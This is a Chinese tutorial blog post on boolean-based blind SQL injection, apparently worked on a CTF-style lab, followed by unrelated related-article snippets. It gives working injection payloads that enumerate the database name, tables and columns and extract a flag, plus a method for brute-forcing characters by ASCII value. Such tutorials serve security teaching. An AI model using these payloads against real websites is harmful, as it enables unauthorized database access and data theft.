【基于布尔的盲注】

一、sql基础

Substr

我们看一下用法1里面的str就是我们需要截取的字符,pos是需要截取的位置,len是我们需要截取的长度,例如右边的substr('123456',1,1)意思就是截取’123456’从第一位开始截取,截取两位,到2为止,用法2里少了一个len,它就会默认从截取的位置开始,一直截取到最后一位:
请添加图片描述

if

我们看到用法里的select if(1>2,1,0);因为1小于2不满足1大于2,于是呢就返回0:
请添加图片描述

Ascii

请添加图片描述

length

下面右边的例子中database()为web,执行后正确返回了web数据库名三个的长度:
请添加图片描述

二、布尔盲注

简介

请添加图片描述

练习

我们来看一下这道题:

请添加图片描述
我们先输入1返回了user:
请添加图片描述
加上单引号看看有没有sql注入,结果什么也没有:
请添加图片描述
我们再输入2,还是显示了user:
请添加图片描述
闭合一下试试,结果还是什么都没有,说明我们的闭合有问题:
请添加图片描述
把单引号删掉,重新出现了use,那么我们之前的union和报错注入都没办法使用了,这时我们就需要用到盲注:请添加图片描述

猜长度

我们先来分析一下盲注的payload:

id=1 and length(database())=3%23

请添加图片描述
我们来测试一下,等于1没有回显:

请添加图片描述
等于3成功回显,说明我们猜对了,并正常输出:

请添加图片描述

猜数据

拿到前面的长度后,我们就可以来猜数据了:

id=1 and if((ascii(substr((select database()),1,1))=118),1,0)%23

请添加图片描述
我们直接来测试,我们第一次猜的118为v,服务器没有返回数据,说明是错的:
请添加图片描述
我们再猜119为w,服务器成功返回数据,那么数据库名的第一个字符就是w:
请添加图片描述
那么当然我们不可能是用手一个一个猜,我们使用爆破模块,使用add给119打上标记:
请添加图片描述

然后选择爆破类似为整数,起始为32到127,因为Ascii码的可见范围就是32~127,步数填1,执行后我们根据length的长度就直接找到了能成功回显的数据包为119:
请添加图片描述
我们接着猜第二位,我们只要把1改成2,就能开始第二位的爆破:
请添加图片描述
成功拿到第二位101,第三位也是同理:
请添加图片描述

猜数据库名
id=1 and if((ascii(substr((select database()),1,1))=118),1,0)%23猜表名长度
id=1 and if((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=8,1,0)%23猜表名
id=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=118),1,0)%23猜列名长度
id=1 and if((select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=7,1,0)%23猜列名
id=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=118),1,0)%23猜数据长度
id=1 and if(((select length(flag) from flag)=38),1,0)%23猜数据
id=1 and if((ascii(substr((select flag from flag),1,1))=102),1,0)%23

我们接着再猜表名的长度,把等于号后面的数字打上标记:
请添加图片描述
依旧选择数字,因为我们这是猜的表名长度,就选1~10:
请添加图片描述
成功拿到表名长度为9,拿表名、列名、数据都是同理,剩下的就不试了:
请添加图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1551932.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

如何在C语言中实现Doris异步执行Insert语句

如何在C语言中实现Doris异步执行Insert语句 Doris(原名Apache Doris)是一个现代化的MPP(Massively Parallel Processing)分析型数据库,适用于超大规模数据的实时查询和分析。为了在C语言中实现向Doris数据库异步插入数据,我们需要解决以下几个关键问题: 设置Doris客户端…

Thinkphp/Laravel基于vue的实验室上机管理系统

目录 技术栈和环境说明具体实现截图设计思路关键技术课题的重点和难点:框架介绍数据访问方式PHP核心代码部分展示代码目录结构解析系统测试详细视频演示源码获取 技术栈和环境说明 采用PHP语言开发,开发环境为phpstudy 开发工具notepad并使用MYSQL数据库…

基于投影滤波算法的rick合成地震波滤波matlab仿真

目录 1.课题概述 2.系统仿真结果 3.核心程序与模型 4.系统原理简介 4.1 RICK合成地震波模型 4.2 投影滤波算法原理 5.完整工程文件 1.课题概述 基于投影滤波算法的rick合成地震波滤波matlab仿真。分别通过标准的滤波投影滤波以及卷积滤波投影滤波对合成地震剖面进行滤波…

了解华为计算产品线,昇腾的业务都有哪些?

🍉 CSDN 叶庭云:https://yetingyun.blog.csdn.net/ 随着 ChatGPT 的现象级爆红,它引领了 AI 大模型时代的深刻变革,进而造成 AI 算力资源日益紧缺。与此同时,中美贸易战的持续也使得 AI 算力国产化适配成为必然趋势。 …

B站字幕提取方法

1.获取json文件内容 1.点击F12进入开发者模式,选择网络模块; 2.输入关键字,例如json、ai_subtitle、subtitle等; 3.点击视频下方的字幕功能,开启;再点击响应单元,复制内容; 2.去jso…

TI DSP TMS320F280025 Note13:CPUtimer定时器原理分析与使用

TMS320F280025 CPUtimer定时器原理分析与使用 ` 文章目录 TMS320F280025 CPUtimer定时器原理分析与使用框图分析定时器中断定时器使用CPUtimers.cCPUtimers.h框图分析 定时器框图如图所示 定时器有一个预分频模块和一个定时/计数模块, 其中预分频模块包括一个 16 位的定时器分…

【数学分析笔记】第4章第1节 微分和导数(1)

4. 微分 4.1 微分和导数 考虑一个函数 y f ( x ) yf(x) yf(x),当 x x x做一些微小的变动,函数值也会有微小的变动,比如: x → x △ x x\to x\bigtriangleup x x→x△x,则 f ( x ) → f ( x △ x ) f(x)\to f(x\bi…

【有啥问啥】卡尔曼滤波(Kalman Filter):从噪声中提取信号的利器

卡尔曼滤波(Kalman Filter):从噪声中提取信号的利器 什么是卡尔曼滤波? 卡尔曼滤波(Kalman Filter)是一种高效的递归滤波器,专为处理包含噪声的线性动态系统而设计。它能够从一系列不完全且含…

网盘能否作为FTP替代产品?企业该如何进行FTP国产化替代?

近年来,信创的概念引入和高效实践落地让更多的行业企业自发性地进行国产化替代,目前信创国产化替代还多发生在操作系统和应用层面,软件工具等目前还在下一阶段规划,但很多企业未雨绸缪,已经在做调研和尝试。 FTP作为世…

大屏娱乐体验新标杆:海信发布全新一代AI电视

在金秋送爽的9月29日,海信以一场盛大的“BIG PLAN百吋风暴”秋季新品发布会,正式揭开了AI电视新时代的序幕。 作为本场发布会上最耀眼的明星,海信AI电视E7N系列凭借无与伦比的AI画质技术和极致性能,引领大屏娱乐体验迈入全新境界&…

仿真设计|基于51单片机的多模式音乐跑马灯

目录 具体实现功能 设计介绍 51单片机简介 资料内容 仿真实现(protues8.7) 程序(Keil5) 全部内容 资料获取 具体实现功能 1、16个发光二极管做跑马灯,跑马灯有10种模式。 2、按键可以切换跑马灯模式&#xff0…

Java笔试02

在网络操作系统中,TCP和UDP是传输层中两个非常重要的协议。TCP提供的是面向连接的、可靠的端到端通信机制,因此TCP协议在注重数据安全的场景下获得了极为广泛的应用。 TCP采用了确认和重发机制来确保数据的可靠传输。 相较于UDP,TCP的优势在…

.NET CORE程序发布IIS后报错误 500.19

发布IIS后浏览时报错误500.19,同时配置文件web.config的路径中也存在问号“?”。 可能原因:没有安装运行时

无人机之编队控制篇

无人机编队控制是指无人机集群在执行任务过程中,如何形成并保持一定的几何构型,以适应平台性能、战场环境、战术任务等要求的控制技术。以下是对无人机编队控制的详细解析: 一、无人机编队控制的主要任务 无人机编队控制主要解决两个问题&a…

Linux 线程同步

前言 上一期我们介绍了线程互斥,并通过加锁解决了多线程并发访问下的数据不一致问题!本期我们来介绍一下同步问题! 目录 前言 一、线程同步 • 线程同步的引入 • 同步的概念 理解同步和饥饿问题 • 条件变量 理解条件变量 • 同步…

系列一、初始ElasticSearch

前言: 最近公司的业务有用到ElasticSearch,虽然说之前业余时间也自学过ElasticSearch技术,但是在公司实际的业务中开发中没有用过,再加上时间比较久远了,很多东西都忘记了,基于此我决定系统的重新学习一下这…

个人项目简单https服务配置

1.SSL简介 SSL证书是一种数字证书,由受信任的证书颁发机构(CA)颁发,用于在互联网通信中建立加密链接。SSL代表“安全套接层”,是用于在互联网上创建加密链接的协议。SSL证书的主要目的是确保数据传输的安全性和隐私性…

鸿蒙NEXT开发环境搭建(基于最新api12稳定版)

注意:博主有个鸿蒙专栏,里面从上到下有关于鸿蒙next的教学文档,大家感兴趣可以学习下 如果大家觉得博主文章写的好的话,可以点下关注,博主会一直更新鸿蒙next相关知识 专栏地址: https://blog.csdn.net/qq_56760790/…

PMP--三模--解题--51-60

文章目录 14.敏捷--每日站会--内容--• 上次站会以来我都完成了什么?• 从现在到下一次站会,我计划完成什么?• 我的障碍(或风险或问题)是什么?--每日站会能够同步与协调相关的活动。14.敏捷--Scrum板 Scru…

【Ubuntu】VMware中虚拟网卡与服务器网卡的绑定

文章目录 服务器网卡和VMware中虚拟网卡的绑定1.在本机上查看需要的网卡名称2.服务器本机设置固定ip3.打开VMware后,将虚拟网卡与本机真实网卡进行绑定。4.给routeOS分配4张网卡,如图所示:5.ubuntu1和ubuntu2只需分配vmnet0和vmnet8即可&…